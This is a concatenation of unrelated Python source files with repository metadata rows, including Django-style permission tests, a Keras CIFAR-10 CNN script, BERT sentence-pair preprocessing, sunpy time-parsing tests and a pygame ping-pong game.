    self.assertEqual(DeletedDocument.objects.count(), 1)
def test_trash_can_empty_view_with_permission(self):
    """With the empty-trash permission the view redirects (302) and
    permanently removes the trashed document."""
    self.test_document.delete()
    self.assertEqual(DeletedDocument.objects.count(), 1)
    self.grant_permission(permission=permission_empty_trash)
    response = self._request_empty_trash_view()
    self.assertEqual(response.status_code, 302)
    # Both the trash entry and the document itself are gone.
    self.assertEqual(DeletedDocument.objects.count(), 0)
    self.assertEqual(Document.objects.count(), 0)
def test_document_print_view_no_access(self):
    """Requesting the print view without access must return 403."""
    response = self._request_document_print_view()
    self.assertEqual(response.status_code, 403)
def test_document_print_view_with_access(self):
    """Granting the document print permission enables the view (200)."""
    self.grant_access(
        obj=self.test_document, permission=permission_document_print
    )
    response = self._request_document_print_view()
    self.assertEqual(response.status_code, 200)
| 35.911255
| 85
| 0.689048
|
4a0a4028a4694621f15495493c1f99fc67a7abfe
| 4,861
|
py
|
Python
|
TensorFlow+Keras/cifar10/cifar10.py
|
16647615268/python
|
933644a49dfac2c614e243e3db378441cb6a6dd7
|
[
"Apache-2.0"
] | 3
|
2019-10-05T07:26:53.000Z
|
2019-10-10T08:08:17.000Z
|
TensorFlow+Keras/cifar10/cifar10.py
|
yangli-os/python
|
ddf5636fb522c0b28f93866f0f65a38fa007a79b
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow+Keras/cifar10/cifar10.py
|
yangli-os/python
|
ddf5636fb522c0b28f93866f0f65a38fa007a79b
|
[
"Apache-2.0"
] | 2
|
2020-06-18T09:54:02.000Z
|
2021-01-24T03:48:19.000Z
|
# -*- coding: utf-8 -*-
"""
CIFAR-10 image classification with a Keras convolutional network.

Created on Mon Jun 4 14:38:23 2018
@author: liyang
"""
from keras.datasets import cifar10
from keras.utils import np_utils  # used below to one-hot encode the labels
import numpy as np
np.random.seed(10)  # fix the RNG seed so runs are reproducible
# Load the CIFAR-10 train/test split of 32x32 RGB images.
(x_train_image,y_train_label),\
(x_test_image,y_test_label)=cifar10.load_data()
#print('train:',len(x_train_image))
#print('test:',len(x_test_image))
#print(x_train_image.shape)
x_Train=x_train_image.astype('float32')  # cast to float so pixels can be normalised
x_Test=x_test_image.astype('float32')
x_Train_normalize=x_Train/255.0  # scale raw 0-255 pixel values into [0, 1]
x_Test_narmalize=x_Test/255.0  # NOTE(review): "narmalize" is a typo, kept for compatibility
y_Train_OneHot=np_utils.to_categorical(y_train_label)  # labels -> one-hot vectors
y_Test_OneHot=np_utils.to_categorical(y_test_label)
# Build the convolutional network.
from keras.models import Sequential
from keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D,Activation,ZeroPadding2D
model=Sequential()  # linear stack of layers
# Conv block 1: 32 3x3 filters; padding='same' keeps the spatial size;
# input is a 32x32 RGB image (3 channels).
model.add(Conv2D(filters=32,kernel_size=(3,3),padding='same',
                 input_shape=(32,32,3),activation='relu'))
model.add(Dropout(0.3))  # drop 30% of activations to reduce overfitting
model.add(Conv2D(filters=32,kernel_size=(3,3),padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))  # 2x2 max-pool halves each spatial dim
# Conv block 2: 64 filters.
model.add(Conv2D(filters=64,kernel_size=(3,3),padding='same',activation='relu'))
model.add(Dropout(0.3))
model.add(Conv2D(filters=64,kernel_size=(3,3),padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
# Conv block 3: 128 filters.
model.add(Conv2D(filters=128,kernel_size=(3,3),padding='same',activation='relu'))
model.add(Dropout(0.3))
model.add(Conv2D(filters=128,kernel_size=(3,3),padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())  # flatten the feature maps into one vector
model.add(Dropout(0.3))
model.add(Dense(1024,activation='relu'))  # fully-connected hidden layer
model.add(Dropout(0.3))
model.add(Dense(10,activation='softmax'))  # softmax -> per-class probabilities
# Cross-entropy loss, Adam optimiser, accuracy metric.
model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
# Resume from saved weights if present, otherwise train from scratch.
try:
    model.load_weights("SaveModel/cifarCnnModel.h5")
    print('模型加载成功,继续训练模型')
except:
    print("加载模型失败,开始训练新模型")
# Hold out 20% for validation, 10 epochs, batches of 128, progress bar on.
train_history=model.fit(x=x_Train_normalize,y=y_Train_OneHot,
                        validation_split=0.2,epochs=10,batch_size=128,verbose=1)
# Plot the training history.
import matplotlib.pyplot as plt
# Helper plotting a train/validation metric pair from train_history.
def show_train_history(train_history,train,validation):
    """Plot a training-set metric against its validation-set counterpart.

    train/validation are keys into train_history.history, e.g.
    ('acc', 'val_acc') or ('loss', 'val_loss').
    """
    plt.plot(train_history.history[train])  # metric on the training data
    plt.plot(train_history.history[validation])  # metric on the validation data
    plt.title('Train History')
    plt.ylabel(train)  # y axis: the metric itself
    plt.xlabel('Epoch')  # x axis: epoch number
    plt.legend(['train','validation'],loc='upper left')  # legend in the top-left corner
    plt.show()
# Show accuracy curves: 'acc' is the training-set accuracy,
# 'val_acc' the validation-set accuracy (no test set involved here).
show_train_history(train_history,'acc','val_acc')
show_train_history(train_history,'loss','val_loss')  # and the loss curves
prediction=model.predict_classes(x_Test_narmalize)  # predict classes for the test set
model.save_weights("SaveModel/cifarCnnModel.h5")
print("Saved model to disk")
# Human-readable names for the ten CIFAR-10 class indices.
label_dict={0:"airplane",1:"automobile",2:"bird",3:"cat",4:"deer",
            5:"dog",6:"frog",7:"horse",8:"ship",9:"truck"}
def plot_images_labels_prediction(images,labels,prediction,idx,num):
    """Show up to 25 test images starting at index *idx*.

    Each subplot is titled with the sample index and its true label;
    when *prediction* is non-empty the predicted label is appended
    as ``=>name``.
    """
    fig=plt.gcf()
    fig.set_size_inches(12,14)  # enlarge the figure for a 5x5 grid
    if num>25:  # never draw more than 25 subplots
        num=25
    for i in range(0,num):
        ax=plt.subplot(5,5,1+i)  # 5 images per row
        ax.imshow(images[idx],cmap='binary')
        # BUG FIX: label and prediction must be read at the same index as
        # the displayed image (idx), not at the subplot counter (i) —
        # the original diverged whenever idx != 0.
        title=str(idx)+','+label_dict[labels[idx][0]]
        if len(prediction)>0:  # append the predicted label when available
            title+='=>'+label_dict[prediction[idx]]
        ax.set_title(title,fontsize=10)
        ax.set_xticks([]);ax.set_yticks([])  # hide axis ticks
        idx+=1  # advance to the next sample
    plt.show()
# Show the first 10 test-set samples together with their predictions.
plot_images_labels_prediction(x_test_image,y_test_label,prediction,idx=0,num=10)
## Optionally show the results as a confusion matrix:
#import pandas as pd
## crosstab builds the confusion matrix with named rows/columns
#print(pd.crosstab(y_test_label,prediction,rownames=['label'],colnames=['prediction']))
scores=model.evaluate(x_Test_narmalize,y_Test_OneHot,verbose=0)  # silent evaluation on the test set
print('accuracy=',scores[1])
| 45.429907
| 91
| 0.716931
|
4a0a41035ec97783246632758208dc6504143b41
| 2,471
|
py
|
Python
|
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding: utf-8 -*-
import csv
import torch
import pickle
from tqdm import tqdm
from utils.utils import tokenizer
from config import BERT_PRETRAINED_PATH
from inputters import InputExample, InputFeatures
MAX_LENGTH = 30
tokenizer = tokenizer()
number_map = {
'0': 1,
'1': 0
}
def read_file(path):
    """Lazily yield rows of a sentence-pair CSV file.

    Skips the header row and remaps the label column (index 2)
    through ``number_map`` before yielding each row.
    """
    # Use a context manager so the handle is closed even when the
    # consumer abandons the generator early (the original leaked it).
    with open(path) as file:
        reader = csv.reader(file)
        next(reader)  # skip the header row
        for line in reader:
            line[2] = number_map[line[2]]
            yield line
def create_examples(data):
    """Wrap raw (text_a, text_b, label) rows into InputExample objects,
    numbering them sequentially as guids."""
    return [
        InputExample(guid=index, text_a=row[0],
                     text_b=row[1], labels=row[2])
        for index, row in enumerate(data)
    ]
def convert_example_to_features(examples):
    """Convert InputExamples into fixed-length BERT sentence-pair features.

    Each example becomes ``[CLS] text_a [SEP] text_b [SEP]`` with
    token ids, segment ids and an attention mask, zero-padded to
    MAX_LENGTH.  Pairs longer than MAX_LENGTH are dropped entirely.
    """
    features = []
    for line in tqdm(examples, total=len(examples), desc='create examples'):
        token_a = tokenizer.tokenize(line.text_a)
        token_b = tokenizer.tokenize(line.text_b)
        # Standard BERT sentence-pair layout.
        token_text = ['[CLS]']+token_a+['[SEP]']+token_b+['[SEP]']
        tokens_ids = tokenizer.convert_tokens_to_ids(token_text)
        # Segment 0 covers [CLS] + text_a + [SEP]; segment 1 covers text_b + [SEP].
        segments_ids = [0]*(len(token_a)+2)+[1]*(len(token_b)+1)
        input_mask = [1]*len(token_text)
        assert len(segments_ids) == len(token_text)
        assert len(input_mask) == len(token_text)
        if len(token_text) > MAX_LENGTH:
            # NOTE(review): over-long pairs are skipped, not truncated.
            continue
        padding = [0]*(MAX_LENGTH-len(token_text))
        tokens_ids += padding
        segments_ids += padding
        input_mask += padding
        assert len(tokens_ids) == MAX_LENGTH
        features.append(InputFeatures(input_ids=tokens_ids,
                                      input_mask=input_mask,
                                      segment_ids=segments_ids,
                                      label_ids=int(line.labels)))
    return features
def create_features(path):
    """Full pipeline: CSV rows -> InputExample list -> padded BERT features."""
    return convert_example_to_features(create_examples(read_file(path)))
# if __name__ == '__main__':
# file_path = '/home/gump/Software/pycharm-2018.1.6/' \
# 'projects/bert-for-classificaion/next_sentence/data/train.csv'
# file = read_file(file_path)
# examples = create_examples(file)
# feature = convert_example_to_features(examples)
#
# with open('val_features.pkl', 'wb') as f:
# pickle.dump(examples, f)
# # examples = pickle.load(f)
# # for i in range(10):
# # print('success')
| 26.287234
| 80
| 0.611493
|
4a0a420d471cf8d04c0663bcc0b176ca41ac94e4
| 562
|
py
|
Python
|
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
This module provides a Client object to handle whois queries.
"""
from .server import Server
DEFAULT_TIMEOUT = 10
class Client(object):
    """Facade for performing whois lookups.

    Accepts an optional ``settings`` dict; the ``timeout`` key
    (default 10 seconds) is consumed here, all other keys are
    forwarded to the whois server object at lookup time.
    """

    def __init__(self, settings=None):
        # Fixes two defects of the original:
        #  * ``settings={}`` was a shared mutable default argument;
        #  * ``dict.has_key`` was removed in Python 3.
        # Copying also leaves the caller's dict intact when we pop().
        settings = dict(settings) if settings else {}
        if 'timeout' in settings:
            self.timeout = settings.pop('timeout')
        else:
            self.timeout = DEFAULT_TIMEOUT
        self.settings = settings

    def lookup(self, domain):
        """Guess the authoritative whois server for *domain*, configure
        it with the remaining settings and run the query."""
        server = Server.guess(domain)
        server.configure(self.settings)
        return server.lookup(domain)
| 21.615385
| 62
| 0.597865
|
4a0a429a794d41a8db85bc52007405a14c503169
| 28
|
py
|
Python
|
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | 1
|
2022-02-17T22:06:26.000Z
|
2022-02-17T22:06:26.000Z
|
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | null | null | null |
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | null | null | null |
from numpretty.main import *
| 28
| 28
| 0.821429
|
4a0a43cfc3ef8d0b09c1145196a380f063e26866
| 702
|
py
|
Python
|
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
# Interface 1
class S1:
    """First of two incompatible service interfaces."""

    def do_something(self, data):
        # Tag the payload with this service's name.
        return "S1" + data
# Interface 2
class N1:
    """Second incompatible service interface, parallel to S1."""

    def do_something(self, data):
        # Tag the payload with this service's name.
        return "N1" + data
# Adapter: grafts a uniform method name onto heterogeneous objects.
class Adapter:
    """Wrap *obj* and expose the callables in *adapted_methods*
    as instance attributes (e.g. ``execute``)."""

    def __init__(self, obj, adapted_methods):
        self.obj = obj
        # Install each mapping entry directly on the instance.
        for attr_name, method in adapted_methods.items():
            setattr(self, attr_name, method)

    def __str__(self):
        # Delegate the string form to the wrapped object.
        return str(self.obj)
def deal_msg():
    """Build the registry mapping config keys to adapted service objects."""
    s1_service = S1()
    n1_service = N1()
    # Register each service under its config key with a uniform
    # ``execute`` entry point bound to its own do_something.
    return {
        "1": Adapter(s1_service, {"execute": s1_service.do_something}),
        "2": Adapter(n1_service, {"execute": n1_service.do_something}),
    }
if __name__ == '__main__':
    # Demo: fetch the adapter registered under key "1" and invoke it
    # through the uniform ``execute`` entry point.
    config = "1"
    data = "data"
    s = deal_msg()[config].execute(data)
    print(s)
| 19.5
| 59
| 0.579772
|
4a0a448b12411602f98974d07d79fdbc065d4052
| 11,796
|
py
|
Python
|
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
from datetime import date, datetime
import numpy as np
import pandas
import pytest
import astropy.time
from astropy.time import Time
import sunpy.time as time
from sunpy.time import parse_time, is_time_equal
LANDING = Time('1966-02-03', format='isot')
def test_parse_time_24():
dt = parse_time("2010-10-10T24:00:00")
assert dt == Time('2010-10-11')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_24_2():
dt = parse_time("2010-10-10T24:00:00.000000")
assert dt == Time('2010-10-11')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_trailing_zeros():
# see issue #289 at https://github.com/sunpy/sunpy/issues/289
dt = parse_time('2010-10-10T00:00:00.00000000')
assert dt == Time('2010-10-10')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_tuple():
dt = parse_time((1966, 2, 3))
assert dt == LANDING
assert dt.format == 'isot'
assert dt.scale == 'utc'
dt = parse_time((1966, 2, 3, 12, 2, 3))
assert dt == Time('1966-2-3T12:2:3')
assert dt.format == 'isot'
assert dt.scale == 'utc'
dt = parse_time((1966, 2, 3, 12, 2, 3, 8266))
assert dt == Time('1966-2-3T12:2:3.008266')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_int():
# Once https://github.com/astropy/astropy/issues/6970 is fixed,
# remove .jd from equality check
dt1 = parse_time(765548612.0, format='utime')
assert dt1.jd == Time('2003-4-5T12:23:32').jd
assert dt1.format == 'utime'
dt2 = parse_time(1009685652.0, format='utime')
assert dt2.jd == Time('2010-12-30T4:14:12').jd
assert dt2.format == 'utime'
def test_parse_time_pandas_timestamp():
ts = pandas.Timestamp(LANDING.datetime)
dt = parse_time(ts)
assert isinstance(dt, astropy.time.Time)
assert dt == LANDING
def test_parse_time_pandas_series():
inputs = [datetime(2012, 1, i) for i in range(1, 13)]
ind = pandas.Series(inputs)
as_inps = Time(inputs)
dts = parse_time(ind)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == as_inps)
def test_parse_time_pandas_series_2():
inputs = [[datetime(2012, 1, 1, 0, 0), datetime(2012, 1, 2, 0, 0)],
[datetime(2012, 1, 3, 0, 0), datetime(2012, 1, 4, 0, 0)]]
ind = pandas.Series(inputs)
as_inps = Time(inputs)
apts = parse_time(ind)
assert isinstance(apts, astropy.time.Time)
assert np.all(apts == as_inps)
assert apts.shape == as_inps.shape
def test_parse_time_pandas_index():
inputs = [datetime(2012, 1, i) for i in range(1, 13)]
ind = pandas.DatetimeIndex(inputs)
as_inps = Time(inputs)
dts = parse_time(ind)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == as_inps)
def test_parse_time_numpy_date():
inputs = np.arange('2005-02', '2005-03', dtype='datetime64[D]')
dts = parse_time(inputs)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == Time([str(dt.astype('M8[ns]')) for dt in inputs]))
def test_parse_time_numpy_datetime():
inputs = np.arange('2005-02-01T00', '2005-02-01T10', dtype='datetime64')
dts = parse_time(inputs)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == Time([str(dt.astype('M8[ns]')) for dt in inputs]))
def test_parse_time_individual_numpy_datetime():
dt64 = np.datetime64('2005-02-01T00')
dt = parse_time(dt64)
assert isinstance(dt, astropy.time.Time)
assert dt == Time('2005-02-01', format='isot')
def test_parse_time_numpy_datetime_timezone():
dt64 = np.datetime64('2014-02-07T16:47:51-0500')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T21:47:51', format='isot')
def test_parse_time_numpy_datetime_ns():
dt64 = np.datetime64('2014-02-07T16:47:51.008288000')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.008288000', format='isot')
dt64 = np.datetime64('2014-02-07T16:47:51.008288123')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.008288123', format='isot')
dt64 = np.datetime64('2014-02-07T16:47:51.234565999')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.234565999')
def test_parse_time_astropy():
ip = astropy.time.Time(['2016-01-02T23:00:01'])
astropy_time = parse_time(ip)
assert astropy_time == ip
assert astropy_time.format == 'isot'
def test_parse_time_datetime():
dt = datetime(2014, 2, 7, 16, 47, 51, 8288)
assert parse_time(dt) == Time('2014-02-07 16:47:51.008288')
assert parse_time(dt).format == 'datetime'
def test_parse_time_date():
dt = parse_time(date(1966, 2, 3))
assert dt == Time('1966-2-3')
assert dt.format == 'iso'
def test_parse_time_now():
"""
Ensure 'parse_time' can be called with 'now' argument to get utc
"""
now = parse_time('now')
assert isinstance(now, astropy.time.Time)
assert now.format == 'datetime'
assert now.scale == 'utc'
def test_parse_time_ISO():
dt1 = Time('1966-02-03T20:17:40')
assert parse_time('1966-02-03').jd == LANDING.jd
assert (
parse_time('1966-02-03T20:17:40') == dt1
)
assert (
parse_time('19660203T201740') == dt1
)
dt2 = Time('2007-05-04T21:08:12.999999')
dt3 = Time('2007-05-04T21:08:12')
dt4 = Time('2007-05-04T21:08:00')
dt5 = Time('2007-05-04')
lst = [
('2007-05-04T21:08:12.999999', dt2),
('20070504T210812.999999', dt2),
('2007/05/04 21:08:12.999999', dt2),
('2007-05-04 21:08:12.999999', dt2),
('2007/05/04 21:08:12', dt3),
('2007-05-04 21:08:12', dt3),
('2007-05-04 21:08', dt4),
('2007-05-04T21:08:12', dt3),
('20070504T210812', dt3),
('2007-May-04 21:08:12', dt3),
('2007-May-04 21:08', dt4),
('2007-May-04', dt5),
('2007-05-04', dt5),
('2007/05/04', dt5),
('04-May-2007', dt5),
('04-May-2007 21:08:12.999999', dt2),
('20070504_210812', dt3),
]
for k, v in lst:
dt = parse_time(k)
assert is_time_equal(dt, v)
assert dt.format == 'isot'
def test_parse_time_tai():
dt = Time('2007-05-04T21:08:12', scale='tai')
dt2 = parse_time('2007.05.04_21:08:12_TAI')
assert dt == dt2
assert dt.scale == dt2.scale
def test_parse_time_leap_second():
dt1 = parse_time('1995-12-31 23:59:60')
dt2 = Time('1995-12-31T23:59:60')
assert dt1.jd == dt2.jd
dt3 = parse_time('1995-Dec-31 23:59:60')
assert dt2.jd == dt3.jd
@pytest.mark.parametrize("ts,fmt", [
(1950.0, 'byear'),
('B1950.0', 'byear_str'),
(63072064.184, 'cxcsec'),
(datetime(2000, 1, 2, 12, 0, 0), 'datetime'),
(2000.45, 'decimalyear'),
('2000-01-01T00:00:00.000(TAI)', 'fits'),
(630720013.0, 'gps'),
('2000-01-01 00:00:00.000', 'iso'),
('2000-01-01T00:00:00.000', 'isot'),
(2451544.5, 'jd'),
(2000.0, 'jyear'),
('J2000.0', 'jyear_str'),
(51544.0, 'mjd'),
(730120.0003703703, 'plot_date'),
(946684800.0, 'unix'),
('2000:001:00:00:00.000', 'yday')
])
def test_parse_time_astropy_formats(ts, fmt):
dt = parse_time(ts, format=fmt)
assert dt.format == fmt
def test_parse_time_int_float():
# int and float values are not unique
# The format has to be mentioned
with pytest.raises(ValueError):
parse_time(100)
with pytest.raises(ValueError):
parse_time(100.0)
@pytest.mark.parametrize("scale", [
'tai',
'tcb',
'tcg',
'tdb',
'tt',
'ut1',
'utc'
])
def test_parse_time_scale(scale):
dt = parse_time('2007-05-04T21:08:12', scale=scale)
dt2 = Time('2007-05-04T21:08:12', scale=scale)
assert is_time_equal(dt, dt2)
assert dt.scale == scale
dt = parse_time(np.datetime64('2007-05-04T21:08:12'), scale=scale)
dt2 = Time('2007-05-04T21:08:12', scale=scale)
assert dt == dt2
assert dt.scale == scale
dt = datetime(2014, 2, 7, 16, 47, 51)
dt = parse_time(dt, scale=scale)
dt2 = Time('2014-02-07T16:47:51', scale=scale)
assert dt == dt2
assert dt.scale == scale
dt = date(2014, 2, 7)
dt = parse_time(dt, scale=scale)
dt2 = Time('2014-02-07', scale=scale)
assert dt == dt2
assert dt.scale == scale
def test_parse_time_list():
tstrings = ['2010-09-03 00:00:00', '2005-09-03 06:00:00',
'1995-12-31 23:59:60']
assert np.all(parse_time(tstrings) == Time(tstrings))
def test_parse_time_list_2():
tstrings = [['1998-01-01 00:00:01', '1998-01-01 00:00:02'],
['1998-01-01 00:00:03', '1995-12-31 23:59:60']]
assert np.all(parse_time(tstrings) == Time(tstrings))
def test_break_time():
t = datetime(2007, 5, 4, 21, 8, 12)
assert time.break_time(t) == '20070504_210812'
def test_day_of_year():
# Note that 2008 is a leap year, 2011 is a standard year
# test that it starts at 1
assert time.day_of_year('2011/01/01') == 1.0
# test fractional day
assert time.day_of_year('2011/01/01 06:00') == 1.25
assert time.day_of_year('2011/01/01 12:00') == 1.50
assert time.day_of_year('2011/01/01 18:00') == 1.75
# test correct number of days in a (standard) year
assert time.day_of_year('2011/12/31') == 365
# test correct number of days in a (leap) year
assert time.day_of_year('2008/12/31') == 366
# test a few extra dates in standard year
assert time.day_of_year('2011/08/01') == 213
assert time.day_of_year('2011/04/10') == 100
assert time.day_of_year('2011/01/31') == 31
assert time.day_of_year('2011/09/30') == 273
# test a few extra dates in a leap year
assert time.day_of_year('2008/08/01') == 214
assert time.day_of_year('2008/04/10') == 101
assert time.day_of_year('2008/01/31') == 31
assert time.day_of_year('2008/09/30') == 274
def test_day_of_year_leapsecond():
# 2015 had a leap second.
# 30/06/2015 23:59:60 was a leap second
assert time.day_of_year('2015/01/31') == 31
assert time.day_of_year('2015/04/10') == 100
assert time.day_of_year('2015/06/30 23:59:60') == 182
assert time.day_of_year('2015/08/01') == 213.00001157407408
assert time.day_of_year('2015/09/30') == 273.00001157407405
def test__iter_empty():
    """_iter_empty reports False while the iterator still yields,
    True once it is exhausted."""
    class CountDown(object):
        # Minimal iterator yielding start_from-1 ... 0, then StopIteration.
        def __init__(self, start_from=0):
            self.start = start_from
        def __iter__(self):
            return self
        def __next__(self):
            self.start -= 1
            if self.start < 0:
                raise StopIteration
            return self.start
        next = __next__  # Support Py2.x
    one_count = CountDown(1)
    # First call consumes the single element -> not empty yet.
    assert time.time._iter_empty(one_count) is False
    # Now exhausted -> empty.
    assert time.time._iter_empty(one_count) is True
def test_is_time():
assert time.is_time(datetime.utcnow()) is True
assert time.is_time('2017-02-14 08:08:12.999') is True
assert time.is_time(Time.now()) is True
assert time.is_time(None) is False
assert time.is_time('2016-14-14 19:08') is False
def test_is_time_in_given_format():
assert time.is_time_in_given_format('2017-02-14 08:08:12.999', "%Y-%m-%d %H:%M:%S.%f") is True
assert time.is_time_in_given_format('2017-02-14 08:08:12.999', "%Y-%m-%dT%H:%M:%S.%f") is False
def test_get_day():
end_of_day = datetime(year=2017, month=1, day=1, hour=23, minute=59, second=59,
microsecond=999)
begining_of_day = time.get_day(end_of_day)
assert begining_of_day.year == 2017
assert begining_of_day.month == 1
assert begining_of_day.day == 1
assert begining_of_day.hour == 0
assert begining_of_day.minute == 0
assert begining_of_day.second == 0
assert begining_of_day.microsecond == 0
| 27.952607
| 99
| 0.629196
|
4a0a458acf65648749f6a31ca5582510dd0f9940
| 2,901
|
py
|
Python
|
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
from pygame import *
'''Необходимые классы'''
#класс-родитель для спрайтов
# Parent class for all game sprites.
class GameSprite(sprite.Sprite):
    """Base sprite: loads an image, scales it and tracks position/speed."""

    def __init__(self, player_image, player_x, player_y, player_speed, wight, height):
        super().__init__()
        # Load and scale the texture to (wight, height) pixels.
        # NOTE(review): "wight" is a typo for "width"; kept for compatibility.
        self.image = transform.scale(image.load(player_image), (wight, height))
        self.speed = player_speed
        self.rect = self.image.get_rect()
        self.rect.x = player_x
        self.rect.y = player_y

    def reset(self):
        # Redraw the sprite at its current position on the module-level window.
        window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
    """A player-controlled paddle that moves vertically inside the window."""

    def _move(self, up_key, down_key):
        # Shared movement logic: the two public methods differed only in
        # which keys they read, so the duplicate bodies are factored here.
        keys = key.get_pressed()
        if keys[up_key] and self.rect.y > 5:
            self.rect.y -= self.speed
        if keys[down_key] and self.rect.y < win_height - 80:
            self.rect.y += self.speed

    def update_r(self):
        """Right paddle: controlled with the arrow keys."""
        self._move(K_UP, K_DOWN)

    def update_l(self):
        """Left paddle: controlled with the W/S keys."""
        self._move(K_w, K_s)
# --- Game scene setup ---
back = (200, 255, 255)  # background colour
win_width = 600
win_height = 500
window = display.set_mode((win_width, win_height))
window.fill(back)
# Flags describing the game state.
game = True
finish = False
clock = time.Clock()
FPS = 60
# Create the ball and the two paddles.
racket1 = Player('racket.png', 10, 200, 4, 30, 150)
racket2 = Player('racket.png', 560, 200, 4, 30, 150)
ball = GameSprite('ball.png', 200, 200, 4, 50, 50)
font.init()
font = font.Font(None, 35)
lose1 = font.render('PLAYER 1 LOSE!', True, (180, 0, 0))
lose2 = font.render('PLAYER 2 LOSE!', True, (180, 0, 0))
speed_x = 3
speed_y = 3
# --- Main loop ---
while game:
    for e in event.get():
        if e.type == QUIT:
            game = False
    if finish != True:
        window.fill(back)
        racket1.update_l()
        racket2.update_r()
        ball.rect.x += speed_x
        ball.rect.y += speed_y
        # Bounce the ball off either paddle.
        if sprite.collide_rect(racket1, ball) or sprite.collide_rect(racket2, ball):
            speed_x *= -1
            speed_y *= 1  # NOTE(review): multiplying by 1 is a no-op
        # Bounce off the top and bottom edges of the window.
        if ball.rect.y > win_height-50 or ball.rect.y < 0:
            speed_y *= -1
        # Ball passed the left paddle: player 1 loses.
        if ball.rect.x < 0:
            finish = True
            window.blit(lose1, (200, 200))
            game_over = True  # NOTE(review): assigned but never read
        # Ball passed the right paddle: player 2 loses.
        if ball.rect.x > win_width:
            finish = True
            window.blit(lose2, (200, 200))
            game_over = True
        racket1.reset()
        racket2.reset()
        ball.reset()
    display.update()
    clock.tick(FPS)
| 29.30303
| 106
| 0.577732
|
4a0a45b0aba470ba1b9b68daeaa2cb57055aa136
| 4,291
|
py
|
Python
|
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | null | null | null |
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | null | null | null |
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | 2
|
2018-02-27T08:42:30.000Z
|
2018-03-09T16:34:46.000Z
|
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import mock
import os
import pytest
import time
from f5.bigip import ManagementRoot
from f5.utils.testutils.registrytools import register_device
from f5.utils.testutils.registrytools import AGENT_LB_DEL_ORDER
